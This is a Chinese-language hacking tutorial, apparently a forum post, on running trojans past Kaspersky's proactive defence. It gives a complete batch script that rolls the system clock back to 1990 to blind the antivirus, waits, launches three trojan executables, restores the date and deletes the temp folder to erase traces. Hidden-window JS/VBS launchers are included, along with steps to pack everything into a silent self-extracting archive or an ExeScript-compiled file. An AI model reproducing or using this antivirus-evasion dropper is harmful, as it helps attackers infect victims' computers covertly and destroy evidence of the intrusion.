思路一：


有人说，用来过巴主动防御的批处理被杀

我们现在只要改一下就可以继续免杀了，看。


方式一：
1.写一个bat批处理，内容如下

::======修改系统时间使卡巴监控失效============
set date=%date%原来没有这句话是被杀的，加上就不会被卡吧杀了 

date 1990-01-01 

date 1990-01-01 

::========倒计时等待15秒======================  由于卡吧关闭要10秒的时间，所以选择15秒比较好
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 15
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End 

::===========倒计时等待结束后运行木马=============
:Next
%systemroot%\temp\木马1.exe   这是你的木马名
%systemroot%\temp\木马2.exe
%systemroot%\temp\木马3.exe
for %%f in (%temp%.\tmp$$$.vbs*) do del %%f 

::======恢复时间(卡巴监控)=======================
date 2007-05-14  让系统时间设为你所指定的时间
date %date%  让系统时间与Internet同步 

::=========清除痕迹============================
RD /S /Q %systemroot%\temp\ 

这些都是老东西，大家应该能看懂，只是做了下免杀。

2.写一个vbs脚本文件用来调用上面的bat文件，内容如下

a.js脚本

new ActiveXObject('WScript.Shell').Run('cmd /c felix.bat',0); 

b.vbs脚本

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c felix.bat",vbhide 

c.vbs脚本2

CreateObject("WScript.Shell").Run "cmd /c felix.bat",0 

3.把这两个文件和木马一起用WinRAR压缩成自解压文件，木马文件名就是1.exe，看我操作
这就是生成好的过卡吧主动的马，运行即可



方式二：
1.打开exescript－－新建批处理－－写入上面bat的代码

2.点击方案－－选项－－勾选上“安静模拟”－－编译F9，一定要点安静模拟

3.将生成出来的文件与木马一起用WinRAR压缩成自解压文件，这样就可以了，和上面的差不多

ExeScript V2.1.1 汉化版(修正版)下载地址：http://www.skycn.com/soft/24946.html



思路二：
通过卡巴主动防御杀手来突破卡吧主动，大家看操作,这个可以捆绑2个木马在一起，捆绑完了以后生成的就是可以过卡吧主动的文件，但是现在不免杀了，大家可以对他进行定位免杀下，还能达到效果的！我就不做测试了。